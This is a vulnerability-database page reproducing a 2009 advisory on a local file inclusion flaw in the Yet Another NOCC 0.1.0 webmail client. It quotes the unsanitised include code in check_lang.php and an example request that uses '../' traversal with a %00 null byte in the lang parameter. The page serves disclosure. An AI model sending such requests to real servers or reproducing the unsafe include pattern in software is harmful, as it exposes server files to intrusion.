Lucene search
K

Yet Another NOCC 0.1.0 Local File Inclusion

🗓️ 09 Feb 2009 00:00:00Reported by KacperType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

YANOCC 0.1.0 Local File Inclusion Vulnerability in check_lang.ph

Code
`Yet Another NOCC 0.1.0 <= Local File Inclusion Vulnerabilities  
  
YANOCC is a simple and fast webmail client which can handle POP3, SMTP, and IMAP servers.   
YANOCC is based on NOCC's code and is written with PHP4. It features multi-language support,   
MIME attachments, displays HTML messages, address book, folder support.  
  
Author: Kacper  
HomePage: http://devilteam.pl/  
http://polskihacking.pl/  
  
in file check_lang.php:  
  
if (!ISSET($lang))  
{  
$ar_lang = explode(",", $HTTP_ACCEPT_LANGUAGE);  
while ($accept_lang = array_shift($ar_lang))  
{  
$tmp = explode(";", $accept_lang);  
$tmp[0] = strtolower($tmp[0]);  
if (file_exists("lang/".$tmp[0].".php"))  
{  
$lang = $tmp[0];  
break;  
}  
}  
if ($lang == "")  
$lang = $default_lang;  
}  
// Fix for faulty PHP install (RH7, see bug #24933)  
$lang = trim($lang);  
require ("lang/".$lang.".php");  
  
Vuln example:  
  
check_lang.php?lang=../[localinclude]%00  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Feb 2009 00:00Current
7.4High risk
Vulners AI Score7.4
16